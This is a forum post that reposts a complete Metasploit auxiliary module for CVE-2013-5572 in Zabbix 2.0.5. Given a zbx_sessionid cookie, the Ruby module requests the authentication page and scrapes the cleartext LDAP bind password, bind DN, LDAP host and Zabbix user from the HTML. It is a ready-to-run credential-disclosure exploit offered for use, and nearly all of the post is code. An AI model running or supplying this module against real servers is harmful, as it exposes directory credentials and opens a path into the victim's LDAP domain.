Jump to content
Aerosol

Zabbix 2.0.5 - Cleartext ldap_bind_password Password Disclosure (MSF)

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

##
# This module requires Metasploit
# Date: 25-09-2013
# Author: Pablo González
# Vendor Homepage: Zabbix -> http://www.zabbix.com 
# Software Link: http://www.zabbix.com 
# Version: 2.0.5
# Tested On: Linux (Ubuntu, Suse, CentOS)
# CVE: CVE-2013-5572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5572
# More Info: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5572
#      http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html
#      http://seclists.org/fulldisclosure/2013/Sep/151
#          http://www.cvedetails.com/cve/CVE-2013-5572/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ldap_bind_password Zabbix CVE-2013-5572',
      'Description'    => %q{
          Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bind password by leveraging management-console access and reading the ldap_bind_password value in the HTML source code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ '@pablogonzalezpe, Pablo Gonzalez' ]
    ))

    register_options([
      OptString.new('zbx_session', [true, 'Cookie zbx_sessionid']),
      OptString.new('TARGETURI', [true, 'Path Zabbix Authentication','/zabbix/authentication.php']),
      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
    ], self.class)

  end

  def run
    req
  end
  def req
    resp = send_request_cgi(
      {
        'host' => datastore['RHOST'],
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path.to_s),
        'cookie' => "zbx_sessionid=#{datastore['zbx_session']}",
        'content-type' => 'application/x-www-form-urlencoded'
      }, datastore['TIMEOUT'])

      ldap_host(resp)
      user_passDomain(resp)
      user_zabbix(resp)
  end

  def ldap_host(response)
    cut = response.body.split("ldap_host\" value=\"")[1]
    if cut != nil
        host = cut.split("\"")[0]
        print_good "LDAP Host => #{host}"
    end
  end

  def user_passDomain(response)
    cut = response.body.split("ldap_bind_dn\" value=\"")[1]
    if cut != nil  
        user = cut.split("\"")[0]
        print_good "User Domain? => #{user}"
    end
    cut = response.body.split("name=\"ldap_bind_password\" value=\"")[1]
    if cut != nil
        pass = cut.split("\"")[0]
        print_good "Password Domain? => #{pass}"
    end
  end

  def user_zabbix(response)
    cut = response.body.split("user\" value=\"")[1]
    if cut != nil
        user = cut.split("\"")[0]
        print_good "User Zabbix => #{user}"
    end
  end
end

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...